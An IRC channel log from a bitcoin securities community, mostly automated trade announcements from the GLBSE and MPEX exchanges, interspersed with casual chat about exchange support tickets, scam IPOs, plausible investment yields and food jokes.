[GLBSE] [NYAN.A] 49 @ 1 = 49 BTC [+] Sep 02 20:29:51 [GLBSE] [NYAN.C] 50 @ 0.7 = 35 BTC [+] Sep 02 20:29:52 [GLBSE] [NYAN.C] 10 @ 0.79 = 7.9 BTC [+] Sep 02 20:29:54 [GLBSE] [NYAN.C] 3 @ 0.9 = 2.7 BTC [+] Sep 02 20:29:55 [GLBSE] [NYAN.C] 12 @ 0.92 = 11.04 BTC [+] Sep 02 20:31:13 [GLBSE] [GIGAMINING] 43 @ 0.8498 = 36.5414 BTC [+] Sep 02 20:31:14 [GLBSE] [GIGAMINING] 7 @ 0.85 = 5.95 BTC [+] Sep 02 20:32:51 [MPEX] [F.GIGA.ETF] 8900 @ 0.00090969 = 8.0962 BTC [-] Sep 02 20:32:52 [MPEX] [F.GIGA.ETF] 18000 @ 0.0009096 = 16.3728 BTC [-] Sep 02 20:32:53 [MPEX] [F.GIGA.ETF] 8016 @ 0.00090281 = 7.2369 BTC [-] Sep 02 20:32:54 [MPEX] [F.GIGA.ETF] 11700 @ 0.00088824 = 10.3924 BTC [-] Sep 02 20:32:56 [MPEX] [F.GIGA.ETF] 1852 @ 0.0008872 = 1.6431 BTC [-] Sep 02 20:32:57 [MPEX] [F.GIGA.ETF] 10800 @ 0.00088298 = 9.5362 BTC [-] Sep 02 20:32:58 [MPEX] [F.GIGA.ETF] 17400 @ 0.00085891 = 14.945 BTC [-] Sep 02 20:32:59 [MPEX] [F.GIGA.ETF] 1042 @ 0.00081962 = 0.854 BTC [-] Sep 02 20:33:01 [MPEX] [F.GIGA.ETF] 12290 @ 0.00080409 = 9.8823 BTC [-] Sep 02 20:33:37 [GLBSE] [NYAN.B] 65 @ 1 = 65 BTC [-] Sep 02 20:33:55 [GLBSE] [OBSI.HRPT] 1 @ 0.102 BTC [-] Sep 02 20:33:56 [GLBSE] [OBSI.HRPT] 7 @ 0.101601 = 0.7112 BTC [-] Sep 02 20:33:57 [GLBSE] [OBSI.HRPT] 90 @ 0.1011 = 9.099 BTC [-] Sep 02 20:33:58 [GLBSE] [OBSI.HRPT] 2 @ 0.10103 = 0.2021 BTC [-] Sep 02 20:34:00 [GLBSE] [OBSI.HRPT] 200 @ 0.10102 = 20.204 BTC [-] Sep 02 20:34:01 [GLBSE] [OBSI.HRPT] 5 @ 0.101 = 0.505 BTC [-] Sep 02 20:34:02 [GLBSE] [OBSI.HRPT] 1 @ 0.1008 BTC [-] Sep 02 20:34:03 [GLBSE] [OBSI.HRPT] 1 @ 0.10004101 BTC [-] Sep 02 20:34:04 [GLBSE] [OBSI.HRPT] 200 @ 0.100041 = 20.0082 BTC [-] Sep 02 20:34:05 [GLBSE] [OBSI.HRPT] 7 @ 0.10001 = 0.7001 BTC [-] Sep 02 20:34:06 [GLBSE] [OBSI.HRPT] 11 @ 0.100001 = 1.1 BTC [-] Sep 02 20:34:07 [GLBSE] [OBSI.HRPT] 120 @ 0.1 = 12 BTC [-] Sep 02 20:34:08 [GLBSE] [OBSI.HRPT] 1200 @ 0.1 = 120 BTC [-] Sep 02 20:34:09 [GLBSE] [OBSI.HRPT] 100 @ 0.1 = 10 BTC [-] Sep 02 20:34:10 [GLBSE] [OBSI.HRPT] 300 @ 0.1 = 30 BTC [-] Sep 02 20:34:11 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Sep 02 20:34:12 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Sep 02 20:34:13 [GLBSE] [OBSI.HRPT] 320 @ 0.1 = 32 BTC [-] Sep 02 20:34:14 [GLBSE] [OBSI.HRPT] 140 @ 0.1 = 14 BTC [-] Sep 02 20:34:15 [GLBSE] [OBSI.HRPT] 100 @ 0.1 = 10 BTC [-] Sep 02 20:34:16 [GLBSE] [OBSI.HRPT] 10 @ 0.1 = 1 BTC [-] Sep 02 20:34:17 [GLBSE] [OBSI.HRPT] 6 @ 0.1 = 0.6 BTC [-] Sep 02 20:34:18 [GLBSE] [OBSI.HRPT] 1000 @ 0.1 = 100 BTC [-] Sep 02 20:34:19 [GLBSE] [OBSI.HRPT] 30 @ 0.1 = 3 BTC [-] Sep 02 20:34:20 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Sep 02 20:34:21 [GLBSE] [OBSI.HRPT] 320 @ 0.1 = 32 BTC [-] Sep 02 20:34:22 [GLBSE] [OBSI.HRPT] 1370 @ 0.1 = 137 BTC [-] Sep 02 20:34:23 [GLBSE] [OBSI.HRPT] 12 @ 0.1 = 1.2 BTC [-] Sep 02 20:34:24 [GLBSE] [PIMP] 5 @ 0.149999 = 0.75 BTC [-] Sep 02 20:34:33 [GLBSE] [NYAN.B] 10 @ 1 = 10 BTC [-] Sep 02 20:36:33 [GLBSE] [OBSI.HRPT] 1300 @ 0.1 = 130 BTC [-] Sep 02 20:38:06 [GLBSE] [OBSI.HRPT] 150 @ 0.1 = 15 BTC [-] Sep 02 20:40:17 [GLBSE] [OBSI.HRPT] 450 @ 0.1 = 45 BTC [-] Sep 02 20:40:48 [GLBSE] [SS] 1 @ 1.701 BTC [-] Sep 02 20:40:50 [GLBSE] [SS] 1 @ 1.7 BTC [-] Sep 02 20:41:40 [GLBSE] [MOVETO.FUND] 3 @ 1.1001 = 3.3003 BTC [-] Sep 02 20:41:46 [GLBSE] [OBSI.HRPT] 13 @ 0.1 = 1.3 BTC [-] Sep 02 20:41:49 [GLBSE] [MMM] 2 @ 0.9 = 1.8 BTC [+] Sep 02 20:43:36 [GLBSE] [BITBOND] 4 @ 0.43 = 1.72 BTC [-] Sep 02 20:43:37 [GLBSE] [BITBOND] 1 @ 0.421 BTC [-] Sep 02 20:43:39 [GLBSE] [BITBOND] 11 @ 0.4201 = 4.6211 BTC [-] Sep 02 20:43:40 [GLBSE] [BITBOND] 3 @ 0.42 = 1.26 BTC [-] Sep 02 20:43:41 [GLBSE] [MMM] 25 @ 0.9 = 22.5 BTC [+] Sep 02 20:47:26 [GLBSE] [MMM] 5 @ 0.9 = 4.5 BTC [+] Sep 02 20:47:28 [GLBSE] [TEEK.B] 1 @ 0.9145 BTC [+] Sep 02 20:47:30 [GLBSE] [TEEK.B] 80 @ 0.915 = 73.2 BTC [+] Sep 02 20:48:22 [GLBSE] [TEEK.B] 2 @ 0.979 = 1.958 BTC [+] Sep 02 20:48:24 [GLBSE] [TEEK.B] 11 @ 0.98 = 10.78 BTC [+] Sep 02 20:49:45 [GLBSE] [TEEK.B] 5 @ 0.99 = 4.95 BTC [+] Sep 02 20:51:49 [GLBSE] [TEEK.A] 12 @ 0.875 = 10.5 BTC [-] Sep 02 20:54:55 [GLBSE] [GIGAMINING] 5 @ 0.85 = 4.25 BTC [+] Sep 02 20:59:00 [GLBSE] [FDBF] 30 @ 0.1499999 = 4.5 BTC [+] Sep 02 21:00:36 [GLBSE] [V.HRL] 10 @ 1 = 10 BTC Sep 02 21:01:42 [GLBSE] [OBSI.HRPT] 99 @ 0.1 = 9.9 BTC [-] Sep 02 21:01:58 [GLBSE] [FOO.PPPPT] 2 @ 0.21 = 0.42 BTC [+] Sep 02 21:02:29 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Sep 02 21:06:32 [GLBSE] [BITBOND] 1 @ 0.42 BTC [-] Sep 02 21:07:10 [GLBSE] [BITBOND] 7 @ 0.4694 = 3.2858 BTC [+] Sep 02 21:08:57 [MPEX] [S.MPOE] 43463 @ 0.00038819 = 16.8719 BTC [-] Sep 02 21:08:59 [MPEX] [S.MPOE] 17842 @ 0.00038932 = 6.9462 BTC [+] Sep 02 21:09:38 [GLBSE] [TEEK.USD] 10 @ 0.094 = 0.94 BTC [-] Sep 02 21:09:40 [GLBSE] [TEEK.USD] 20 @ 0.09401 = 1.8802 BTC [+] Sep 02 21:09:44 [GLBSE] [TEEK.USD] 110 @ 0.094999 = 10.4499 BTC [+] Sep 02 21:14:45 [GLBSE] [GIGAMINING] 6 @ 0.85 = 5.1 BTC [+] Sep 02 21:18:48 [GLBSE] [GMVT-BOT] 1 @ 0.14 BTC [+] Sep 02 21:19:43 [GLBSE] [FDBF] 20 @ 0.1499999 = 3 BTC [+] Sep 02 21:25:35 [GLBSE] [FDBF] 2 @ 0.1499999 = 0.3 BTC [+] Sep 02 21:25:57 [GLBSE] [CPA] 500 @ 0.06 = 30 BTC [-] Sep 02 21:26:02 [GLBSE] [CPA] 500 @ 0.06 = 30 BTC [-] Sep 02 21:26:56 [GLBSE] [BITBOND] 3 @ 0.42521 = 1.2756 BTC [-] Sep 02 21:27:55 [GLBSE] [GMVT-BOT] 3 @ 0.14 = 0.42 BTC [+] Sep 02 21:28:07 [GLBSE] [OBSI.HRPT] 10 @ 0.1 = 1 BTC [-] Sep 02 21:28:56 [GLBSE] [GMVT-BOT] 4 @ 0.14 = 0.56 BTC [+] Sep 02 21:30:23 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Sep 02 21:32:44 [GLBSE] [OBSI.HRPT] 180 @ 0.1 = 18 BTC [-] Sep 02 21:32:55 [GLBSE] [FDBF] 40 @ 0.1499999 = 6 BTC [+] Sep 02 21:37:47 [GLBSE] [FDBF] 8 @ 0.1499999 = 1.2 BTC [+] Sep 02 21:40:12 [GLBSE] [OBSI.HRPT] 5 @ 0.1 = 0.5 BTC [-] Sep 02 21:41:14 [GLBSE] [GIGAMINING] 1 @ 0.849 BTC [-] Sep 02 21:41:15 [GLBSE] [GIGAMINING] 50 @ 0.846 = 42.3 BTC [-] Sep 02 21:46:12 [GLBSE] [V.HRL] 5 @ 1 = 5 BTC Sep 02 21:46:53 [GLBSE] [HYDRO.BONDS] 2 @ 1.59889 = 3.1978 BTC [+] Sep 02 21:47:53 [GLBSE] [KRAKEN] 22 @ 0.01 = 0.22 BTC [+] Sep 02 21:49:55 [GLBSE] [FPGAMINING] 6 @ 0.7777 = 4.6662 BTC [+] Sep 02 21:50:47 [GLBSE] [BITBOND] 8 @ 0.4651 = 3.7208 BTC [+] Sep 02 21:50:48 [GLBSE] [OBSI.HRPT] 4 @ 0.1 = 0.4 BTC [-] Sep 02 21:55:48 [GLBSE] [FDBF] 1 @ 0.1499999 BTC [+] Sep 02 22:10:15 [GLBSE] [TEEK.B] 1 @ 0.77 BTC [-] Sep 02 22:15:53 [GLBSE] [DMC] 1 @ 0.08 BTC [+] Sep 02 22:18:19 [GLBSE] [OBSI.HRPT] 650 @ 0.1 = 65 BTC [-] Sep 02 22:23:09 [GLBSE] [BIB.BVPS] 11 @ 0.00449 = 0.0494 BTC [+] Sep 02 22:29:56 [GLBSE] [TYGRR.BOND-P] 1 @ 0.169 BTC [+] Sep 02 22:31:10 [GLBSE] [BITBOND] 2 @ 0.4693 = 0.9386 BTC [+] Sep 02 22:34:00 [GLBSE] [BITBOND] 2 @ 0.4651 = 0.9302 BTC [-] Sep 02 22:40:32 [GLBSE] [GIGAMINING] 2 @ 0.8499 = 1.6998 BTC [+] Sep 02 22:54:39 [GLBSE] [ARS] 35 @ 0.01561 = 0.5464 BTC [+] Sep 02 22:54:41 [GLBSE] [ARS] 151 @ 0.0156 = 2.3556 BTC [-] Sep 02 22:54:42 [GLBSE] [ARS] 1 @ 0.015 BTC [-] Sep 02 22:55:28 [MPEX] [S.MPOE] 22043 @ 0.00038757 = 8.5432 BTC [-] Sep 02 22:56:41 [GLBSE] [CPA] 24 @ 0.06 = 1.44 BTC [-] Sep 02 22:57:52 [GLBSE] [FPGAMINING] 2 @ 0.7777 = 1.5554 BTC [+] Sep 02 23:01:54 [GLBSE] [OBSI.HRPT] 9 @ 0.1 = 0.9 BTC [-] Sep 02 23:02:26 [GLBSE] [MMM] 14 @ 0.9 = 12.6 BTC [+] Sep 02 23:03:16 [MPEX] [S.MPOE] 9800 @ 0.00038767 = 3.7992 BTC [+] Sep 02 23:03:17 [MPEX] [S.MPOE] 558 @ 0.00038932 = 0.2172 BTC [+] Sep 02 23:18:46 [MPEX] [S.MPOE] 6400 @ 0.00039239 = 2.5113 BTC [+] Sep 02 23:22:50 FDBF dividend payment in 5 min Sep 02 23:24:08 [GLBSE] [JLP-BMD] 4 @ 0.09499 = 0.38 BTC [-] Sep 02 23:26:08 [GLBSE] [FDBF] 9 @ 0.1499999 = 1.35 BTC [+] Sep 02 23:27:29 [GLBSE] [GSDPT] 3000 @ 0.0034 = 10.2 BTC [+] Sep 02 23:30:36 [GLBSE] [JAH] 1 @ 0.1549 BTC [+] Sep 02 23:32:11 [GLBSE] [GSDPT] 103 @ 0.0033999 = 0.3502 BTC [-] Sep 02 23:33:02 [GLBSE] [OBSI.HRPT] 8 @ 0.1 = 0.8 BTC [-] Sep 02 23:33:39 [GLBSE] [ASICMINER] 15 @ 0.1183 = 1.7745 BTC [+] Sep 02 23:33:58 [GLBSE] [FDBF] 2 @ 0.1499999 = 0.3 BTC [+] Sep 02 23:35:50 [GLBSE] [ASICMINER] 5 @ 0.1183 = 0.5915 BTC [+] Sep 02 23:36:26 [GLBSE] [ASICMINER] 15 @ 0.11838999 = 1.7758 BTC [+] Sep 02 23:36:58 [GLBSE] [ASICMINER] 50 @ 0.11849 = 5.9245 BTC [+] Sep 02 23:37:58 [GLBSE] [ASICMINER] 15 @ 0.11839 = 1.7759 BTC [-] Sep 02 23:39:25 [GLBSE] [BITBOND] 8 @ 0.4399 = 3.5192 BTC [-] Sep 02 23:43:53 [GLBSE] [FDBF] 30 @ 0.1499999 = 4.5 BTC [+] Sep 02 23:45:27 [GLBSE] [COGNITIVE] 2 @ 0.645 = 1.29 BTC [-] Sep 02 23:46:41 [MPEX] [S.MPOE] 14500 @ 0.00038969 = 5.6505 BTC [-] Sep 02 23:50:54 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1 BTC [+] Sep 02 23:52:27 [GLBSE] [FDBF] 10 @ 0.1499999 = 1.5 BTC [+] Sep 02 23:52:48 [GLBSE] [TYGRR.BOND-P] 1 @ 0.169 BTC [+] Sep 02 23:55:46 [GLBSE] [FDBF] 3 @ 0.1499999 = 0.45 BTC [+] Sep 03 00:02:01 !ticker FDBF Sep 03 00:02:05 [GLBSE:FDBF] [Bid: 0.14] [Ask: 0.1499999] [Spread: 0.0099999] [Last: 0.1499999] [24hVol: 41.0999726] [7dAvg: 0.14670862] Sep 03 00:05:35 [GLBSE] [OBSI.HRPT] 3 @ 0.10348 = 0.3104 BTC [+] Sep 03 00:08:30 [GLBSE] [NASTY] 2 @ 0.61 = 1.22 BTC [+] Sep 03 00:08:32 [GLBSE] [NASTY] 1 @ 0.63999 BTC [+] Sep 03 00:12:43 [MPEX] [F.GIGA.ETF] 4200 @ 0.00086679 = 3.6405 BTC [+] Sep 03 00:12:45 [MPEX] [F.GIGA.ETF] 1281 @ 0.00084986 = 1.0887 BTC [-] Sep 03 00:20:02 [GLBSE] [GIGAMINING] 1 @ 0.8499 BTC [+] Sep 03 00:23:43 [GLBSE] [SS] 1 @ 1.85 BTC [+] Sep 03 00:24:52 [GLBSE] [SS] 2 @ 1.94499 = 3.89 BTC [+] Sep 03 00:24:54 [GLBSE] [SS] 2 @ 1.945 = 3.89 BTC [+] Sep 03 00:25:37 [GLBSE] [KRAKEN] 14 @ 0.01 = 0.14 BTC [+] Sep 03 00:26:09 [GLBSE] [GMVT-BOT] 2 @ 0.14 = 0.28 BTC [+] Sep 03 00:26:26 Guys is there a problem with GLBSE support? It's been a week and my ticket is still unresolved. Anyone used the support latelly? The answered to the ticket and asked me to do somthing which I did and I still haven't heard from them. Sep 03 00:26:28 [GLBSE] [FPGA.CONTRACT] 3 @ 0.078 = 0.234 BTC [-] Sep 03 00:27:06 (I needed two step auth turned off, that was the problem. And they asked me to prove that I still own some of the addresses that have sent coins to my account in the past) Sep 03 00:29:37 !seen nefario Sep 03 00:29:40 I havent seen {0} Sep 03 00:29:41 ;;seen nefario Sep 03 00:29:41 nefario was last seen in #bitcoin-assets 4 days, 13 hours, 11 minutes, and 39 seconds ago: BTC-Mining: GBLSE HAXOR Sep 03 00:30:35 Tritonio write again Sep 03 00:30:51 also ColdHardMetal can maybe assist somewhat Sep 03 00:31:24 kakobrekla: you mean write the support ticket again? Sep 03 00:31:35 support@glbse.com Sep 03 00:32:27 yeah that's what I did in the first place. Maybe nefario is out of town. Is he the only guy in the support system? I'll send a new ticket. Unless ColdHardMetal has another suggestion. Sep 03 00:34:17 [GLBSE] [RSM] 4 @ 0.3 = 1.2 BTC [+] Sep 03 00:34:25 Sorry I just noticed that there is #GLBSE. I'll ask there too. Thanks for the help kakobrekla. Sep 03 00:34:35 You could try his gmail Sep 03 00:35:55 [GLBSE] [PUREASIC] 1 @ 0.8 BTC [+] Sep 03 00:37:16 [GLBSE] [ASICMINER] 1 @ 0.11829 BTC [-] Sep 03 00:42:40 [GLBSE] [V.HRL] 1 @ 1 BTC Sep 03 00:42:53 [GLBSE] [PPT.DIV] 21 @ 0.01 = 0.21 BTC [-] Sep 03 00:43:51 [GLBSE] [OBSI.HRPT] 3 @ 0.10348 = 0.3104 BTC [+] Sep 03 00:49:23 [GLBSE] [FDBF] 1 @ 0.1499999 BTC [+] Sep 03 00:51:31 [MPEX] [S.MPOE] 30500 @ 0.00039239 = 11.9679 BTC [+] Sep 03 00:51:33 [MPEX] [S.MPOE] 9200 @ 0.00039249 = 3.6109 BTC [+] Sep 03 01:00:44 [GLBSE] [FPGAMINING] 1 @ 0.7777 BTC [+] Sep 03 01:03:48 [GLBSE] [FPGAMINING] 1 @ 0.7777 BTC [+] Sep 03 01:03:53 [GLBSE] [GIGAMINING] 1 @ 0.8499 BTC [+] Sep 03 01:06:38 [GLBSE] [BTC-MINING] 2 @ 0.9799 = 1.9598 BTC [+] Sep 03 01:07:42 [GLBSE] [BTC-MINING] 3 @ 0.99999 = 3 BTC [+] Sep 03 01:08:04 [MPEX] [S.MPOE] 33100 @ 0.00039223 = 12.9828 BTC [-] Sep 03 01:08:49 [GLBSE] [FPGAMINING] 12 @ 0.7777 = 9.3324 BTC [+] Sep 03 01:13:35 [GLBSE] [OBSI.HRPT] 1 @ 0.10348 BTC [+] Sep 03 01:21:16 [GLBSE] [KRAKEN] 1 @ 0.01 BTC [+] Sep 03 01:22:37 [GLBSE] [GSDPT] 139 @ 0.0033999 = 0.4726 BTC [-] Sep 03 01:23:42 [GLBSE] [OBSI.HRPT] 4 @ 0.10348 = 0.4139 BTC [+] Sep 03 01:23:51 [GLBSE] [OBSI.HRPT] 2 @ 0.10348 = 0.207 BTC [+] Sep 03 01:23:52 [GLBSE] [OBSI.HRPT] 99 @ 0.1035 = 10.2465 BTC [+] Sep 03 01:23:53 [GLBSE] [OBSI.HRPT] 49 @ 0.103587 = 5.0758 BTC [+] Sep 03 01:24:42 [GLBSE] [OBSI.HRPT] 8 @ 0.103587 = 0.8287 BTC [+] Sep 03 01:25:31 [GLBSE] [OBSI.HRPT] 1 @ 0.103587 BTC [+] Sep 03 01:28:07 [GLBSE] [PUREMINING] 11 @ 0.0934 = 1.0274 BTC [-] Sep 03 01:28:44 [GLBSE] [PUREMINING] 1 @ 0.0934 BTC [-] Sep 03 01:32:30 [GLBSE] [BBBB] 300 @ 0.00024 = 0.072 BTC [+] Sep 03 01:32:32 [GLBSE] [YABMC] 4 @ 0.1178 = 0.4712 BTC [+] Sep 03 01:32:40 [GLBSE] [GIGAMINING] 1 @ 0.8451 BTC [-] Sep 03 01:35:29 [GLBSE] [KRAKEN] 60 @ 0.01 = 0.6 BTC [+] Sep 03 01:35:30 [GLBSE] [YABMC] 1 @ 0.1178 BTC [+] Sep 03 01:40:18 [GLBSE] [BDT] 3 @ 1.01 = 3.03 BTC [-] Sep 03 01:41:40 [GLBSE] [OBSI.ABMO] 6 @ 0.087 = 0.522 BTC [-] Sep 03 01:45:04 [GLBSE] [JAH] 1 @ 0.15489 BTC [-] Sep 03 01:45:06 [GLBSE] [JAH] 1 @ 0.1549 BTC [+] Sep 03 01:45:07 [GLBSE] [JAH] 18 @ 0.155 = 2.79 BTC [+] Sep 03 01:52:18 [GLBSE] [CPA] 21 @ 0.05 = 1.05 BTC [-] Sep 03 01:53:47 [GLBSE] [OBSI.HRPT] 10 @ 0.1035 = 1.035 BTC [-] Sep 03 02:00:35 [GLBSE] [BFLS.RIG] 3 @ 0.941 = 2.823 BTC [-] Sep 03 02:00:36 [GLBSE] [BFLS.RIG] 5 @ 0.94 = 4.7 BTC [-] Sep 03 02:01:44 [GLBSE] [OBSI.HRPT] 6 @ 0.1035 = 0.621 BTC [-] Sep 03 02:02:51 [GLBSE] [FDBF] 2 @ 0.1499999 = 0.3 BTC [+] Sep 03 02:04:44 [GLBSE] [OBSI.HRPT] 2 @ 0.1035 = 0.207 BTC [-] Sep 03 02:23:59 [GLBSE] [FUTUREFUND] 10 @ 0.00012432 = 0.0012 BTC [+] Sep 03 02:29:01 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.8 BTC [+] Sep 03 02:32:12 bah i'm offline for a few hours everyone leaves me offlines and goes offline. Sep 03 02:32:16 what is this world coming to! Sep 03 02:32:38 not erryone. Sep 03 02:32:48 lolk! Sep 03 02:33:15 [GLBSE] [FUTUREFUND] 23 @ 0.00012433 = 0.0029 BTC [+] Sep 03 02:39:29 [GLBSE] [BIB.BVPS] 6 @ 0.00449 = 0.0269 BTC [+] Sep 03 02:41:20 [MPEX] [S.DICE] 12000 @ 0.0034 = 40.8 BTC [+] Sep 03 02:42:31 [GLBSE] [PUREMINING] 12 @ 0.0934 = 1.1208 BTC [-] Sep 03 02:46:25 [MPEX] [S.MPOE] 16429 @ 0.00039249 = 6.4482 BTC [+] Sep 03 02:46:27 [MPEX] [S.MPOE] 7671 @ 0.0003926 = 3.0116 BTC [+] Sep 03 02:47:35 [GLBSE] [KRAKEN] 20 @ 0.01 = 0.2 BTC [+] Sep 03 02:55:53 [GLBSE] [SILVER] 3 @ 0.00999999 = 0.03 BTC [+] Sep 03 02:58:42 [GLBSE] [GIGAMINING] 1 @ 0.8498 BTC [+] Sep 03 02:58:44 [GLBSE] [GIGAMINING] 9 @ 0.8499 = 7.6491 BTC [+] Sep 03 02:58:45 [GLBSE] [GIGAMINING] 2 @ 0.8499999 = 1.7 BTC [+] Sep 03 02:58:45 [GLBSE] [GIGAMINING] 52 @ 0.85 = 44.2 BTC [+] Sep 03 02:58:47 [GLBSE] [GIGAMINING] 10 @ 0.8698 = 8.698 BTC [+] Sep 03 02:58:48 [GLBSE] [GIGAMINING] 71 @ 0.87 = 61.77 BTC [+] Sep 03 02:58:49 [GLBSE] [GIGAMINING] 2 @ 0.875 = 1.75 BTC [+] Sep 03 02:58:50 [GLBSE] [GIGAMINING] 20 @ 0.875 = 17.5 BTC [+] Sep 03 03:00:28 [MPEX] [F.GIGA.ETF] 7319 @ 0.0008363 = 6.1209 BTC [-] Sep 03 03:00:30 [MPEX] [F.GIGA.ETF] 9188 @ 0.00083911 = 7.7097 BTC [+] Sep 03 03:00:31 [MPEX] [F.GIGA.ETF] 8493 @ 0.00084548 = 7.1807 BTC [+] Sep 03 03:01:24 [GLBSE] [YABMC] 35 @ 0.1119 = 3.9165 BTC [-] Sep 03 03:01:25 [GLBSE] [YABMC] 107 @ 0.1118 = 11.9626 BTC [-] Sep 03 03:01:27 [GLBSE] [YABMC] 130 @ 0.1116 = 14.508 BTC [-] Sep 03 03:01:28 [GLBSE] [YABMC] 1 @ 0.11 BTC [-] Sep 03 03:02:47 [GLBSE] [FUTUREFUND] 241 @ 0.00012433 = 0.03 BTC [+] Sep 03 03:03:48 [GLBSE] [BITBOND] 12 @ 0.4161 = 4.9932 BTC [-] Sep 03 03:03:49 [GLBSE] [BITBOND] 9 @ 0.416 = 3.744 BTC [-] Sep 03 03:03:51 [GLBSE] [BITBOND] 10 @ 0.41500001 = 4.15 BTC [-] Sep 03 03:03:52 [GLBSE] [BITBOND] 200 @ 0.415 = 83 BTC [-] Sep 03 03:05:05 [GLBSE] [OBSI.HRPT] 1 @ 0.1033 BTC [-] Sep 03 03:09:20 [GLBSE] [V.HRL] 20 @ 1 = 20 BTC Sep 03 03:09:28 [MPEX] [S.BVPS] 199 @ 0.00346504 = 0.6895 BTC [+] Sep 03 03:09:29 [MPEX] [S.BVPS] 36 @ 0.00353088 = 0.1271 BTC [+] Sep 03 03:12:14 [MPEX] [S.BVPS] 492 @ 0.00373698 = 1.8386 BTC [+] Sep 03 03:12:23 [GLBSE] [FPGAMINING] 32 @ 0.7777 = 24.8864 BTC [+] Sep 03 03:13:45 [MPEX] [S.BVPS] 8 @ 0.00373698 = 0.0299 BTC [+] Sep 03 03:13:46 [MPEX] [S.BVPS] 962 @ 0.00378 = 3.6364 BTC [+] Sep 03 03:15:55 OFFLINE! Sep 03 03:29:27 lol ? Sep 03 03:29:33 [GLBSE] [BTC-MINING] 2 @ 0.99999 = 2 BTC [+] Sep 03 03:30:44 [GLBSE] [SILVER] 32 @ 0.00999999 = 0.32 BTC [+] Sep 03 03:31:51 [GLBSE] [COGNITIVE] 3 @ 0.645 = 1.935 BTC [-] Sep 03 03:32:58 [GLBSE] [SILVER] 112 @ 0.01 = 1.12 BTC [+] Sep 03 03:33:48 [GLBSE] [OBSI.HRPT] 1 @ 0.1033 BTC [-] Sep 03 03:34:53 !ticker gsdpt Sep 03 03:34:56 [GLBSE:GSDPT] [Bid: 0.003] [Ask: 0.00335] [Spread: 0.00035] [Last: 0.0033999] [24hVol: 99.0023102] [7dAvg: 0.0033069] Sep 03 03:35:19 hm Sep 03 03:35:23 not going to well Sep 03 03:35:35 apparently ppls are flipping for 3% ? Sep 03 03:35:38 !ticker s.dice Sep 03 03:35:39 [MPEX:S.DICE] 1day: 0.0033 / 0.0033525 / 0.0034 (316850 shares, 1,062.24 BTC), 30day: 0.0032 / 0.00326784 / 0.0034 (3405013 shares, 11,127.05 BTC) Sep 03 03:35:57 [GLBSE] [HYDRO.BONDS] 1 @ 1.59888 BTC [-] Sep 03 03:36:12 [GLBSE] [NYAN.B] 1 @ 1 BTC [-] Sep 03 03:36:17 doubt they are flippin Sep 03 03:36:42 you mean people are selling for 33x that bought for 34 ? Sep 03 03:37:28 im thinking so Sep 03 03:37:45 heck, maybe they bought for 70 Sep 03 03:37:51 i know there were some of those. Sep 03 03:41:27 meh Sep 03 03:41:33 the golder era of ipoing is over Sep 03 03:42:02 golden* Sep 03 03:42:06 o it is ? Sep 03 03:42:08 ;;ticker Sep 03 03:42:08 Best bid: 10.1792, Best ask: 10.22012, Bid-ask spread: 0.04092, Last trade: 10.1792, 24 hour volume: 24686, 24 hour low: 9.71922, 24 hour high: 10.35579 Sep 03 03:42:25 bitcoin was cheap and stable Sep 03 03:42:33 people were throwing monies at anything Sep 03 03:42:52 as usual with noob communities, a scammer got it all. Sep 03 03:43:12 the real stuff doesn't pay enough FOR THE RISKS INVOLVED :D Sep 03 03:43:57 im not talking about or just about pirate Sep 03 03:44:24 yeah, there's been a number of fake ipos Sep 03 03:45:19 kakobrekla you can't really not talk about it. i mean, i soaked up a good chunk of change that people were trying to invest. Sep 03 03:45:25 i mean he* Sep 03 03:45:39 mircea_popescu: now we need some of these 1% a week things to turn scam so real businesses can come in Sep 03 03:45:56 BTC-Mining 1% a week might, maybe, marginally, be sustainable. possibly. Sep 03 03:46:09 the reason i say this is btc inflation. Sep 03 03:46:41 but it is a little high for most legit businesses, I agree that you can make 1% a week loaning bitcoins and whatnot Sep 03 03:46:43 Someone called? Sep 03 03:46:46 .py 7* 24 * 6 * 50 / 10000000.0 Sep 03 03:46:48 0.00504 Sep 03 03:46:55 it's like half a percent a week. Sep 03 03:47:37 so if you do inflation free rate it is maybe something like Sep 03 03:47:44 .py 1.005 ** 52 Sep 03 03:47:45 1.29609015373 Sep 03 03:47:51 30% pa isn't impossible. Sep 03 03:48:22 at the very least, from a macro standpoint, the argument can be brought. Sep 03 03:48:44 BTC-Mining i dunno, did they ? Sep 03 03:50:28 pa = per anum? Sep 03 03:50:30 ya Sep 03 03:50:35 [GLBSE] [FUTUREFUND] 20 @ 0.00012433 = 0.0025 BTC [+] Sep 03 03:50:37 [GLBSE] [NASTY] 1 @ 0.6 BTC [-] Sep 03 03:51:22 i can get ~ 10k usd at 29.99% pa right now Sep 03 03:51:25 [GLBSE] [NASTY] 1 @ 0.59 BTC [-] Sep 03 03:51:32 [GLBSE] [FUTUREFUND] 2 @ 0.00012433 = 0.0002 BTC [+] Sep 03 03:51:40 sounds pretty extortionate. Sep 03 03:51:49 it's called maxing out my credit cards with cash advances Sep 03 03:51:56 last time i borrowed was something like 18mn @7.2 Sep 03 03:56:33 [GLBSE] [FPGAMINING] 5 @ 0.7561001 = 3.7805 BTC [-] Sep 03 03:56:35 [GLBSE] [FPGAMINING] 10 @ 0.7560001 = 7.56 BTC [-] Sep 03 03:56:36 [GLBSE] [FPGAMINING] 15 @ 0.7559 = 11.3385 BTC [-] Sep 03 03:56:55 18mn of what Sep 03 03:57:26 of dollahs. Sep 03 03:57:51 not bad Sep 03 03:59:58 You loaned 18 minutes? xD Sep 03 04:01:05 lol Sep 03 04:01:18 ya. minutes. like, you know, kebab and such Sep 03 04:01:30 by the way, what does a french grasshopper eat ? Sep 03 04:02:09 grass Sep 03 04:02:13 croissant? Sep 03 04:02:39 grassants :D Sep 03 04:02:47 lol Sep 03 04:04:07 joke du fromage Sep 03 04:05:14 I'm getting hungry Sep 03 04:06:05 im kind of sick. i ate this delicios cake on which the nut that made it added about half inch of pure chocolate frosting. Sep 03 04:06:25 i guess i never should have had seconds. Sep 03 04:07:28 You always should have seconds aplenty. Especially after borrowing 18 minutes. Sep 03 04:08:57 haha the two are unrelated. Sep 03 04:10:24 [GLBSE] [ARS] 40 @ 0.01475 = 0.59 BTC [-] Sep 03 